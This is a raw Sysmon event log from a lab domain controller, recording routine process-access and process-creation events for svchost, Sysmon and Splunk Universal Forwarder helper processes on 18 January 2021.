13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8ED8-6005-9800-00000000A301}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.541{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8ED8-6005-9800-00000000A301}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:24.542{59A5CD1D-8ED8-6005-9800-00000000A301}4680C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.261{59A5CD1D-8EDA-6005-9900-00000000A301}46364888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDA-6005-9900-00000000A301}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EDA-6005-9900-00000000A301}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.120{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDA-6005-9900-00000000A301}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:26.121{59A5CD1D-8EDA-6005-9900-00000000A301}4636C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.980{59A5CD1D-8EDB-6005-9B00-00000000A301}48604788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDB-6005-9B00-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 